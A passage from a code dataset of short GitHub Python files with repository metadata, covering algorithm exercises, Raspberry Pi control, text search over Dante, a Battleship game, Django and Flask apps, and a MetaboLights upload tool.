'\\n'.join(auxText)\n","repo_name":"rhyolight/nupic.cerebro","sub_path":"experiment_runner.py","file_name":"experiment_runner.py","file_ext":"py","file_size_in_byte":8919,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"73723638199","text":"def inorder(X):\n\n global res\n if X <= N and TREE[X] != 0:\n if X*2<=N:\n inorder(X*2)\n res += TREE[X]\n if X*2<=N:\n inorder(X*2+1)\n\n\nfor tc in range(1,11):\n N = int(input())\n TREE = [0]*(N+1)\n for i in range(N):\n li = input().split()\n node, V = int(li[0]), li[1]\n TREE[node] = V\n res = ''\n inorder(1)\n\n print(f'#{tc} {res}')","repo_name":"hhhhjjj11/TIL","sub_path":"알고시간/2월 22일/중위순회.py","file_name":"중위순회.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7280945915","text":"import gui\nimport RPi.GPIO as GPIO\nimport threading\nimport time\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nbutton_pin = 20\nmotor_pin_1 = 13\nmotor_pin_2 = 14\nled_pin = 24\nGPIO.setup(button_pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(motor_pin_1, GPIO.OUT)\nGPIO.setup(motor_pin_2, GPIO.OUT)\nGPIO.setup(led_pin, GPIO.OUT)\n\nclosed = False\ndef on_close():\n global closed\n closed = True\n GPIO.output(motor_pin_1, False)\n GPIO.output(motor_pin_2, False)\n\ndef on_power_button_click():\n threading.Thread(target=pulse_led, args=[]).start()\n\n#...\ndef pulse_led():\n while window.powerButton.isChecked() and not closed:\n t = window.periodSpinBox.value() / 2\n GPIO.output(led_pin, True)\n window.virtualLED.setChecked(True) # Turn on virtual LED\n time.sleep(t)\n GPIO.output(led_pin, False)\n window.virtualLED.setChecked(False) # Turn off virtual LED\n time.sleep(t)\n#...\n\nwindow = gui.create(\"motor_control4.ui\", on_close)\nwindow.connect_event(window.powerButton.clicked, target=on_power_button_click, args=[])\nwindow.show()\n\ntoggled = False\nprevious_state = False\nwhile not closed:\n state = GPIO.input(button_pin)\n if (previous_state == False and state == True):\n toggled = not toggled\n if toggled:\n window.directionLabel.setText(\"Clockwise\")\n else:\n window.directionLabel.setText(\"Counter-Clockwise\")\n if window.powerButton.isChecked():\n if not toggled:\n GPIO.output(motor_pin_1, False)\n GPIO.output(motor_pin_2, True)\n else:\n GPIO.output(motor_pin_1, True)\n GPIO.output(motor_pin_2, False)\n else:\n GPIO.output(motor_pin_1, False)\n GPIO.output(motor_pin_2, False)\n previous_state = state\n window.update()\n time.sleep(0.01)","repo_name":"geneva-egr101/coding-resources","sub_path":"Tutorial2/11_virtual_led.py","file_name":"11_virtual_led.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14543216919","text":"import re\r\nimport json\r\nimport unidecode\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import RegexpTokenizer\r\nfrom gensim import models\r\nfrom gensim.corpora import Dictionary\r\nfrom gensim import similarities\r\n\r\ndef load_data(file_name):\r\n index = {}\r\n with open (file_name, \"r\", encoding=\"utf8\") as BigFile:\r\n titolo_canto = ''\r\n num_terzina = 0\r\n verso_terzina = 0\r\n for line in BigFile.readlines():\r\n line = unidecode.unidecode(line)\r\n if re.search(\"^\\w+\\s.\\sCanto\\s\\w+$\",line):\r\n line = line.strip()\r\n index[line] = {}\r\n titolo_canto = line\r\n num_terzina = 0\r\n verso_terzina = 0\r\n 
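                # a canto heading line (word, separator, 'Canto', numeral)
                # starts a new canto: reset the terzina/verso counters and
                # index the following tercets under this title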
elif line == '\\n':\r\n continue\r\n else:\r\n k_terzina = str(num_terzina)\r\n k_verso = str(verso_terzina)\r\n if verso_terzina == 0:\r\n index[titolo_canto][k_terzina] = {}\r\n index[titolo_canto][k_terzina][k_verso] = line.strip('\\n')\r\n if verso_terzina == 2:\r\n verso_terzina = 0\r\n num_terzina += 1\r\n else:\r\n verso_terzina += 1\r\n\r\n a_file = open(\"./divina_commedia.json\", \"w\")\r\n json.dump(index, a_file)\r\n a_file.close()\r\n\r\n #print(\"Total Number of Documents:\",len(documents_list))\r\n #print(\"Titles are:\")\r\n #for t in titles:\r\n # print(t)\r\n return index\r\n\r\ndef titles_json(doc_set):\r\n\r\n titles = list()\r\n for canto in doc_set:\r\n for terzina in doc_set[canto]:\r\n t = canto+'_'+terzina\r\n titles.append(t)\r\n return titles\r\n\r\ndef preprocess_data(doc_set):\r\n\r\n tokenizer = RegexpTokenizer(r'\\w+')\r\n ita_stops = set(stopwords.words('italian'))\r\n ita_stemmer = nltk.stem.snowball.ItalianStemmer()\r\n texts = list()\r\n for canto in doc_set:\r\n for terzina in doc_set[canto]:\r\n bow = list()\r\n for verso in doc_set[canto][terzina]:\r\n raw = doc_set[canto][terzina][verso].lower()\r\n tokens = tokenizer.tokenize(raw)\r\n stopped_tokens = [i for i in tokens if not i in ita_stops]\r\n stemmed_tokens = [ita_stemmer.stem(i) for i in stopped_tokens]\r\n bow.extend(stemmed_tokens)\r\n texts.append(bow)\r\n return texts\r\n\r\ndef prepare_corpus(doc_clean):\r\n dictionary = Dictionary(doc_clean)\r\n doc_term_matrix = [dictionary.doc2bow(doc) for doc in doc_clean]\r\n return dictionary,doc_term_matrix\r\n\r\ndef prepare_query(query,dictionary):\r\n \r\n tokenizer = RegexpTokenizer(r'\\w+')\r\n ita_stops = set(stopwords.words('italian'))\r\n ita_stemmer = nltk.stem.snowball.ItalianStemmer()\r\n query = unidecode.unidecode(query)\r\n raw = query.lower()\r\n tokens = tokenizer.tokenize(raw)\r\n stopped_tokens = [i for i in tokens if not i in ita_stops]\r\n final = [ita_stemmer.stem(i) for i in stopped_tokens]\r\n vec_bow = dictionary.doc2bow(final)\r\n return vec_bow\r\n\r\ndef find_terzina(title,index):\r\n canto, terzina = tuple(title.split(\"_\"))\r\n output = ''\r\n for key in index[canto][terzina]:\r\n output += index[canto][terzina][key]+'\\n'\r\n return output\r\n\r\ndef create_model(doc_term_matrix):\r\n return TfidfModel(doc_term_matrix)\r\n\r\ndef create_sim_mtrx(corpus_tfidf):\r\n return similarities.MatrixSimilarity(corpus_tfidf) \r\n\r\nif __name__ == '__main__':\r\n try:\r\n with open(\"divina_commedia.json\",\"r\") as f_index:\r\n index = json.load(f_index)\r\n except IOError:\r\n index = load_data('divina_commedia.txt')\r\n data = preprocess_data(index)\r\n titles = titles_json(index)\r\n dictionary,doc_term_matrix = prepare_corpus(data)\r\n model = models.TfidfModel(doc_term_matrix)\r\n corpus_tfidf = model[doc_term_matrix]\r\n similarity_mtrx = similarities.MatrixSimilarity(corpus_tfidf) \r\n while True:\r\n query = input(\"What do you want to look for today?\\n\")\r\n if(not query):\r\n break\r\n print(\"\\nYour query:\")\r\n print(query+'\\n')\r\n query = prepare_query(query,dictionary)\r\n vec_tdidf = model[query]\r\n res_query = similarity_mtrx[vec_tdidf]\r\n res_query = sorted(enumerate(res_query), key = lambda item: -item[1])\r\n i = 0\r\n for doc_position, doc_score in res_query:\r\n if i < 5:\r\n print(doc_score)\r\n print(titles[doc_position])\r\n print(find_terzina(titles[doc_position],index))\r\n i += 1\r\n\r\n \r\n \r\n\r\n \r\n 
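# Summary of the retrieval flow above: each terzina is tokenised, stopword-
# filtered and stemmed, mapped to a bag-of-words via Dictionary.doc2bow,
# weighted with TfidfModel, and ranked against the query through
# similarities.MatrixSimilarity; the five best-scoring terzine are printed.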
","repo_name":"socratesgit/dante-text-processing","sub_path":"caronte.py","file_name":"caronte.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42843101076","text":"n, c = map(int, input().split())\narray = []\nfor i in range(n):\n array.append(int(input()))\narray.sort()\n\n\nstart = 1\nend = array[-1]-array[0]\n\nresult = (start + end) // 2\nwhile start <= end:\n mid = (start + end) // 2\n\n #공유기 몇 개 설치 가능한지\n count = 1\n prev = array[0]\n for i in range(1, n):\n if array[i] >= prev + mid:\n prev = array[i]\n count += 1\n\n if count < c:\n end = mid - 1\n else:\n result = mid\n start = mid + 1\n\nprint(result)","repo_name":"summerlight636/Algorithm","sub_path":"이코테 기출문제/이진탐색/29_공유기 설치.py","file_name":"29_공유기 설치.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22697911662","text":"from random import randint\r\n\r\n#KLASA DO PRZECHOWYWANIA WSPÓŁRZĘDNYCH (X,Y)\r\nclass Coords:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n\r\n def __eq__(self, other):\r\n return self.x == other.x and self.y == other.y\r\n\r\n def __repr__(self):\r\n return f\"({self.x}, {self.y})\"\r\n\r\n#OBSŁUGA WYJĄTKÓW\r\nclass OutOfBoardException(Exception):\r\n def __str__(self):\r\n return \"Próbujesz strzelać poza plansze!\"\r\n\r\n\r\nclass BoardUsedException(Exception):\r\n def __str__(self):\r\n return \"Już zastrzeliłeś tą kratkę\"\r\n\r\nclass BoardWrongShipException(Exception):\r\n pass\r\n\r\n#KLASA STATEK\r\nclass Ship:\r\n def __init__(self, kratka, maszty, orientacja):\r\n self.kratka = kratka\r\n self.maszty = maszty\r\n self.orientacja = orientacja\r\n self.doOdstrzalu = maszty\r\n\r\n#FUNCKJA ZWRACAJĄCA KRATKI STATKU\r\n @property\r\n def statekPlynie(self):\r\n wspolStatku = [] #lista wspolrzednych statku\r\n for i in range(self.maszty):\r\n wspolX = self.kratka.x\r\n wspolY = self.kratka.y\r\n if self.orientacja == 0: #ustawienie statku zorientowanego poziomo\r\n wspolX += i\r\n elif self.orientacja == 1: #ustawienie statku zorientowanego pionowo\r\n wspolY += i\r\n wspolStatku.append(Coords(wspolX, wspolY))\r\n return wspolStatku\r\n\r\n'''----------KLASA POLA DO GRY-----------'''\r\nclass Board:\r\n#DEKLARACJA ROZGRYWKI\r\n def __init__(self, hid=False, size=10):\r\n self.size = size #rozmiar\r\n self.hid = hid #plansza ze statkami ukryta przed graczem\r\n self.count = 0 #licznik zatopionych statków\r\n self.pole = [[\" \"] * size for _ in range(size)] #wypełnienie pola gry\r\n self.busy = [] #zajęte kratki\r\n self.ships = [] #lista statków\r\n\r\n#FUNKCJA DODAJĄCA STATEK\r\n def add_ship(self, ship):\r\n for d in ship.statekPlynie:\r\n if self.out(d) or d in self.busy: #warunek: statek poza polem gry lub statek na zajętym polu\r\n raise BoardWrongShipException()\r\n for d in ship.statekPlynie:\r\n self.pole[d.x][d.y] = \"■\" #oznaczenie statku na kratce\r\n self.busy.append(d) #oznaczenie kratki d jako zajętej\r\n\r\n self.ships.append(ship) #dodanie utworzonego statku do listy statków\r\n self.contour(ship) #obrysowanie pól graniczących ze statkiem\r\n\r\n#FUNKCJA NIEPOZWALAJĄCA NA STYKANIE SIĘ STATKÓW BOKAMI I ROGAMI\r\n def contour(self, ship, verb=False):\r\n near = [\r\n (-1, -1), (-1, 0), (-1, 1),\r\n (0, -1), (0, 0), (0, 1),\r\n (1, -1), (1, 0), (1, 1)\r\n ]\r\n for d in ship.statekPlynie:\r\n for dx, dy in near:\r\n cur = Coords(d.x + dx, d.y + dy)\r\n if not 
(self.out(cur)) and cur not in self.busy:\r\n self.busy.append(cur)\r\n\r\n#FUNCKCJA WYŚWIETLENIA POLA GRY\r\n def __str__(self):\r\n wiersz = \" | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10|\"\r\n for i, row in enumerate(self.pole):\r\n wiersz += f\"\\n{i + 1} | \" + \" | \".join(row) + \" |\"\r\n if self.hid: #plansza dla gracza\r\n wiersz = wiersz.replace(\"■\", \" \") #zamiana pola oznaczonego statkiem jako pole niewiadome dla użytkownika\r\n return wiersz\r\n\r\n#FUNKCJA SPRAWDZAJĄCA CZY STATEK NIE BĘDZIE ZNAJDOWAŁ SIĘ POZA POLEM GRY\r\n def out(self, kratka):\r\n return not ((0 <= kratka.x < self.size) and (0 <= kratka.y < self.size))\r\n\r\n#FUNKCJA DO STRZELANIA W STATEK\r\n def strzel(self, kratka):\r\n if self.out(kratka):\r\n raise OutOfBoardException()\r\n if kratka in self.busy:\r\n raise BoardUsedException()\r\n\r\n self.busy.append(kratka)\r\n for ship in self.ships:\r\n if kratka in ship.statekPlynie: #jesli na kratce znajduje sie maszt statku\r\n ship.doOdstrzalu -= 1 #-1 maszt statku\r\n self.pole[kratka.x][kratka.y] = \"X\" #oznacz kratke jako trafione\r\n if ship.doOdstrzalu == 0: #jesli maszt=0 => zniszczono caly statek\r\n self.count += 1 #licznik zniszczonych statkow +1\r\n self.contour(ship, verb=True)\r\n print(\"Statek jest zniszczony!\")\r\n return False\r\n else:\r\n print(\"Statek został trafiony!\")\r\n return True\r\n\r\n self.pole[kratka.x][kratka.y] = \"*\" #kratka sprawdzona, ale nietrafiona\r\n print(\"Pudło!\")\r\n return False\r\n\r\n def begin(self):\r\n self.busy = []\r\n\r\n'''------------KLASA GRACZA------------'''\r\nclass Player:\r\n def __init__(self, board):\r\n self.board = board\r\n#FUNKCJA DO WPROWADZENIA WSPOLRZEDNYCH PRZEZ GRACZA\r\n def wprowadzWspolrzedne(self):\r\n while True:\r\n cords = input(\"Twój ruch: \").split() #pobranie wspolrzednych z klawiatury\r\n if len(cords) != 2: #jesli gracz podal niepoprawna ilosc argumentow\r\n print(\"Musisz podac 2 wspolrzedne!\")\r\n continue\r\n x, y = cords\r\n if not (x.isdigit()) or not (y.isdigit()): #jesli gracz podal niepoprawne dane\r\n print(\"Wspolrzedne musza byc dodatnimi liczbami calkowitymi!\")\r\n continue\r\n return Coords(int(x) - 1, int(y) - 1) #zwrocenie formatu odpowiedniego dla tablic\r\n\r\n def wykonajRuch(self):\r\n while True:\r\n cel = self.wprowadzWspolrzedne()\r\n strzal = self.board.strzel(cel)\r\n return strzal\r\n\r\n\r\n'''--------------KLASA ROZGRYWKI--------------'''\r\nclass Game:\r\n def __init__(self, size=10):\r\n self.size = size\r\n plansza = self.rozmiescStatki()\r\n plansza.hid=True\r\n self.player = Player(plansza)\r\n#FUNKCJA GENERUJĄCA LOSOWE ROZMIESZCZENIE STATKÓW NA POLU GRY\r\n def rozmiescStatki(self):\r\n statki = [4, 3, 3, 2, 2, 2, 1, 1, 1, 1]\r\n board = Board(size=self.size)\r\n for statek in statki:\r\n while True:\r\n ship = Ship(Coords(randint(0, self.size), randint(0, self.size)), statek, randint(0, 1)) #generowanie statku\r\n try:\r\n board.add_ship(ship) #dodanie wygenerowanego statku na plansze\r\n break\r\n except:\r\n pass\r\n board.begin()\r\n return board\r\n#FUNKCJA ODPOWIADAJĄCA NA OBSŁUGĘ ROZGRYWKI\r\n def start(self):\r\n for ruch in range(30):\r\n print(\"-\" * 20)\r\n print(self.player.board)\r\n self.player.wykonajRuch()\r\n if self.player.board.count == 10: #wygrana w grze (liczba zastrzelonych statkow=0)\r\n print(\"***Wygrałeś!***\")\r\n return True\r\n print(\"Niestety przegrałeś\")\r\n#URUCHOMIENIE 
GRY\r\nGame().start()","repo_name":"ewakobrzynska/Battleship","sub_path":"GraWStatki/venv/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":6855,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6334765314","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\nfrom django.views.generic import CreateView\n\nfrom mainapp.forms import DialogMessageForm\nfrom mainapp.models import Dialog, DialogMemebers, Message\n\n\n@login_required\ndef index(request):\n dialogues = request.user.dialogs.select_related('dialog').all()\n context = {\n 'page_title': 'диалоги',\n 'dialogues': dialogues,\n }\n\n return render(request, 'mainapp/index.html', context)\n\n\ndef dialog_show(request, dialog_pk):\n dialog = get_object_or_404(Dialog, pk=dialog_pk)\n sender = dialog.get_sender(request.user.pk)\n\n context = {\n 'page_title': 'диалог',\n 'dialog': dialog,\n 'sender': sender,\n }\n\n return render(request, 'mainapp/dialog_show.html', context)\n\n\ndef dialog_create(request):\n dialogues = request.user.dialogs.select_related('dialog').all(). \\\n values_list('dialog_id', flat=True)\n interlocutors = DialogMemebers.objects.filter(dialog__in=dialogues). \\\n values_list('member_id', flat=True)\n new_interlocutors = User.objects.exclude(pk__in=interlocutors)\n\n context = {\n 'page_title': 'новый диалог',\n 'new_interlocutors': new_interlocutors,\n }\n return render(request, 'mainapp/dialog_create.html', context)\n\n\ndef user_dialog_create(request, user_id):\n interlocutor = User.objects.get(pk=user_id)\n dialog = Dialog.objects.create(\n name=interlocutor.username\n )\n DialogMemebers.objects.create(\n dialog=dialog,\n member=request.user,\n role=DialogMemebers.CREATOR\n )\n DialogMemebers.objects.create(\n dialog=dialog,\n # member_id=user_id,\n member=interlocutor,\n role=DialogMemebers.INTERLOCUTOR\n )\n\n return HttpResponseRedirect(\n reverse('main:dialog_show', kwargs={'dialog_pk': dialog.pk})\n )\n\n\n# CBV\ndef dialog_delete(request, pk):\n # instance = Dialog.objects.filter(pk=pk).first()\n instance = get_object_or_404(Dialog, pk=pk)\n instance.delete()\n return HttpResponseRedirect(reverse('main:index'))\n\n\n# def dialog_message_create(request):\nclass DialogMessageCreate(CreateView):\n model = Message\n form_class = DialogMessageForm\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n form = context['form']\n sender_pk = self.request.resolver_match.kwargs['sender_pk']\n # print(context)\n # print(form.fields['sender'].initial)\n # print(dir(form.fields['sender']))\n # print(sender_pk)\n # print(form.initial)\n # form.fields['sender'].initial = sender_pk\n form.initial['sender'] = sender_pk\n\n return context\n\n def get_success_url(self):\n # print(self.object.sender.dialog_id)\n # return reverse('main:index')\n return reverse(\n 'main:dialog_show',\n kwargs={'dialog_pk': self.object.sender.dialog_id}\n )\n\n\ndef dialog_new_messages(request, dialog_pk):\n if request.is_ajax():\n dialog = Dialog.objects.filter(pk=dialog_pk).first()\n status = False\n new_messages = None\n if dialog:\n status = True\n _new_messages = dialog.get_messages_new(request.user.pk)\n # _new_messages.update(read=True)\n new_messages = [\n {'pk': el.pk,\n 'username': el.sender.member.username,\n 'created': 
el.created.strftime('%Y.%m.%d %H:%M'),\n 'text': el.text}\n for el in _new_messages\n ]\n print(f'new messgaes {len(new_messages)}, read update')\n _new_messages.update(read=True)\n\n return JsonResponse({\n 'status': status,\n 'new_messages': new_messages,\n })\n","repo_name":"kurganITteacher/python-adv","sub_path":"210329/sources/kpk_messenger/mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3595465615","text":"# -*- coding: utf-8 -*-\nfrom ..hum_tools_const import HumToolsConst\n\n\nclass Lang:\n ja_JP = 'ja_JP'\n en_US = 'en_US'\n\n @staticmethod\n def pack(_ja_JP, _en_US, select=None):\n \"\"\"日本語の文字列と英語の文字列をパックし、適切な言語の文字列を返す。\n\n Args:\n _ja_JP (str): 日本語の文字列。\n _en_US (str): 英語の文字列。\n select (str, optional): 返す言語を指定する。デフォルトはNone。\n\n Returns:\n str: Mayaを立ち上げた言語の文字列を返す。select引数で指定した場合は、指定した言語の文字列を返す。\n\n Note:\n Mayaを立ち上げた言語やselectで指定した言語が日本語や英語以外の場合は、英語になる。\n \"\"\"\n if select is None:\n lang = HumToolsConst.LANGUAGE\n else:\n lang = select\n\n if lang == Lang.ja_JP:\n return _ja_JP\n elif lang == Lang.en_US:\n return _en_US\n else:\n return _en_US","repo_name":"Hum9183/MayaHumTools","sub_path":"Contents/scripts/humtools/util/lang.py","file_name":"lang.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"ja","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"22262139731","text":"import sqlite3\nfrom transformers import pipeline\n\n# connect to SQLite database\nconn = sqlite3.connect('blog_posts.db')\nc = conn.cursor()\n\n# load pre-trained QAS model\nqas = pipeline(\"question-answering\", model=\"distilbert-base-cased-distilled-squad\")\n\n# define function to get answer to question\ndef get_answer(question):\n # execute SQL query to get data from database\n c.execute(\"SELECT reprocessed_text FROM blog_posts\")\n data = c.fetchall()\n\n # loop over data to find best answer\n best_answer = ''\n best_score = 0\n for text in data:\n # get answer to question using pre-trained QAS model\n answer = qas({'question': question, 'context': text[0]})\n score = answer['score']\n if score > best_score:\n best_score = score\n best_answer = answer['answer']\n return best_answer\n\n# example usage\nquestion = 'What is the purpose of this dataset?'\nanswer = get_answer(question)\nprint(answer)\n","repo_name":"ErizY/Question-answering-system-improvado-job-test","sub_path":"test question.py","file_name":"test question.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20634495964","text":"import pandas as pd\nfrom openpyxl import Workbook\nimport src.wrangler as wr\nfrom flask import Flask, render_template, request, send_file\nimport os\nimport src.constants as con\nimport shutil\nimport src.dataframe_helper as dh\nimport src.exceptions as e\n\napp = Flask(__name__)\n\n\ndef read_usps_report(usps_file, hcde_file, misc_file, buyboard_file, pca_file, friendswood_file, month, year):\n usps_fmd_df = e.read_excel_with_exception(f'{usps_file}', sheet_name=f'{year} LTD (FMD)')\n hdce_df = e.read_excel_with_exception(f'{hcde_file}', sheet_name=f'{year}')\n llc_df = e.read_excel_with_exception(f'{usps_file}', sheet_name=f'{year} FMD - DPFS LLC')\n misc_df = e.read_excel_with_exception(f'{misc_file}', sheet_name=f'{year}')\n buyboard_df = e.read_excel_with_exception(f'{buyboard_file}', sheet_name=f'{year}')\n pca_df = 
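The question-answering record above scores every stored row with a separate pipeline call. A minimal sketch of the same idea batched into one call, assuming the `blog_posts` schema shown and a recent `transformers` version whose QA pipeline accepts parallel question/context lists; `top_answer` is an illustrative name, not part of the original script.

import sqlite3
from transformers import pipeline

qas = pipeline("question-answering", model="distilbert-base-cased-distilled-squad")

def top_answer(question, db_path="blog_posts.db"):
    # Fetch every candidate context once, then score them in a single call.
    with sqlite3.connect(db_path) as conn:
        contexts = [row[0] for row in conn.execute("SELECT reprocessed_text FROM blog_posts")]
    results = qas(question=[question] * len(contexts), context=contexts)
    if isinstance(results, dict):  # a single pair comes back as one dict
        results = [results]
    # Keep the span the model is most confident about across all posts.
    return max(results, key=lambda r: r["score"])["answer"]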
e.read_excel_with_exception(f'{pca_file}', sheet_name=f'{year}')\n friendswood_df = e.read_excel_with_exception(f'{friendswood_file}', sheet_name=f'{year}')\n\n wb = Workbook()\n\n # Create FS Paid\n wr.create_fs_sheet(usps_df=usps_fmd_df, hcde_df=hdce_df, misc_df=misc_df, buyboard_df=buyboard_df,\n pca_df=pca_df, friendswood_df=friendswood_df, wb=wb, month=month, year=year, fs_type='Paid',\n df_creation_func=dh.create_paid_df, last_row_columns=con.FS_PAID_LAST_ROW_COLS,\n columns_to_exclude_from_generic_styles=con.FS_PAID_COLS_TO_EXCLUDE)\n\n # Create FS Outstanding\n wr.create_fs_sheet(usps_df=usps_fmd_df, hcde_df=hdce_df, misc_df=misc_df, buyboard_df=buyboard_df,\n pca_df=pca_df, friendswood_df=friendswood_df, wb=wb, month=month, year=year,\n fs_type='Outstanding', df_creation_func=dh.create_outstanding_df,\n last_row_columns=con.FS_OUTSTANDING_LAST_ROW_COLS,\n columns_to_exclude_from_generic_styles=con.FS_OUTSTANDING_COLS_TO_EXCLUDE)\n\n # Create FS WIP\n wr.create_fs_sheet(usps_df=usps_fmd_df, hcde_df=hdce_df, misc_df=misc_df, buyboard_df=buyboard_df,\n pca_df=pca_df, friendswood_df=friendswood_df, wb=wb, month=month, year=year, fs_type='WIP',\n df_creation_func=dh.create_wip_df, last_row_columns=con.FS_WIP_LAST_ROW_COLS,\n columns_to_exclude_from_generic_styles=con.FS_WIP_COLS_TO_EXCLUDE)\n\n # Create LLC Paid\n wr.create_llc_sheet(llc_df, wb, llc_type='Paid', last_row_cols=con.LLC_PAID_LAST_ROW_COLS,\n cols_to_exclude=con.LLC_PAID_COLS_TO_EXCLUDE, month=month, year=year)\n\n # Create LLC Outstanding\n wr.create_llc_sheet(llc_df, wb, llc_type='Outstanding', last_row_cols=con.LLC_OUTSTANDING_LAST_ROW_COLS,\n cols_to_exclude=con.LLC_OUTSTANDING_COLS_TO_EXCLUDE, month=month, year=year)\n\n # Create LLC WIP\n wr.create_llc_sheet(llc_df, wb, llc_type='WIP', last_row_cols=con.LLC_WIP_LAST_ROW_COLS,\n cols_to_exclude=con.LLC_WIP_COLS_TO_EXCLUDE, month=month, year=year)\n\n wb.remove_sheet(wb.get_sheet_by_name('Sheet'))\n\n return wb\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', month_options=con.MONTH_OPTIONS)\n\n\n@app.route('/process', methods=['POST'])\ndef process_spreadsheets():\n year = request.form['year']\n month = request.form['month']\n uploaded_files = request.files.getlist('spreadsheets')\n\n upload_dir = 'uploads'\n\n # Check if the upload directory exists and delete its contents if it does\n if os.path.exists(upload_dir):\n for file in os.listdir(upload_dir):\n file_path = os.path.join(upload_dir, file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print(f\"Error deleting {file_path}: {e}\")\n\n os.makedirs(upload_dir, exist_ok=True)\n\n usps_file = ''\n hcde_file = ''\n misc_file = ''\n buyboard_file = ''\n pca_file = ''\n friendswood_file = ''\n\n for uploaded_file in uploaded_files:\n if uploaded_file.filename != '':\n if 'USPS' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n usps_file = file_path\n elif 'HCDE' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n hcde_file = file_path\n elif 'MISC' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n misc_file = file_path\n elif 'BuyBoard' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n buyboard_file = 
file_path\n elif 'PCA' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n pca_file = file_path\n elif 'Friendswood' in uploaded_file.filename:\n file_path = os.path.join('uploads', uploaded_file.filename)\n uploaded_file.save(file_path)\n friendswood_file = file_path\n else:\n alert_message = f'Unknown file uploaded: {uploaded_file.filename}'\n return f\"\"\n\n if (usps_file == '' or hcde_file == '' or misc_file == '' or pca_file == '' or buyboard_file == '' or\n friendswood_file == ''):\n alert_message = f'Missing one or more files to create the WIP file'\n return f\"\"\n\n try:\n wb = read_usps_report(usps_file=usps_file, hcde_file=hcde_file, friendswood_file=friendswood_file, year=year,\n misc_file=misc_file, pca_file=pca_file, buyboard_file=buyboard_file, month=month)\n except Exception as ex:\n return f\"\"\n\n results_file = f'uploads/{con.MONTH_TO_ZERO_PADDED_NUMBER[month]}-{year} WIP.xlsx'\n wb.save(results_file)\n\n return send_file(results_file, as_attachment=True)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"bpolasek519/tracy_monthly_report","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72800340919","text":"#!/usr/bin/env python\n\n\"\"\"\nPython script to upload project folders/files to MetaboLights Labs Projects\n\nThird party dependency: IMPORTANT!!!\nREMEMBER TO INSTALL ASPERA CONNECT When USING MTBLS UPLOADER\n\nDependencies:\n os, sys, argparse, json, requests, subprocess\n\nUsage:\n python uploadToMetaboLightsLabs.py -t -i [ ] -p -n -s \n or\n uploadToMetaboLightsLabs.py -t -i [ ] -p -n -s \n\nArguments:\n -t MetaboLights Labs API_KEY\n -i pathToFile1, pathToFile2, . . ., pathToFileN\n -p MetaboLights Labs Project ID\n -n Create new project if project doesnt exist\n -s server [ \"prod\", \"dev\", \"test\" ]\n\"\"\"\n\nimport argparse\nimport ast\nimport glob\nimport json\nimport logging\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nimport zipfile\n\nimport requests\n\napi_token = None\ndirectories = []\nfiles = []\nproject_id = None\nnew_project_flag = False\nlog_file = \"cli.log\"\nenv = \"dev\"\nservers = [\"prod\", \"dev\", \"test\"]\nserverPortDictionary = {\n \"prod\": {\n \"server\": \"http://www.ebi.ac.uk/metabolights/\",\n \"port\": \"\"\n },\n \"dev\": {\n \"server\": \"http://wwwdev.ebi.ac.uk/metabolights/\",\n \"port\": \"\"\n },\n \"test\": {\n \"server\": \"http://localhost.ebi.ac.uk:8080/metabolights/\",\n \"port\": \"\"\n }\n}\ntmpdir = \"\"\n\n\ndef main(arguments):\n logging.basicConfig(filename=log_file, level=logging.DEBUG)\n usage = \"\"\"\n python uploadToMetaboLightsLabs.py -t --i [ ] -p -n -s \n or\n uploadToMetaboLightsLabs.py -t --i [ ] -p -n -s \n or\n python uploadToMetaboLightsLabs.py -t --I --v -p -n -s \n or\n uploadToMetaboLightsLabs.py -t --I --v -p -n -s \nArguments:\n -t MetaboLights Labs API_KEY\n\n --i pathToFile1, pathToFile2, . . 
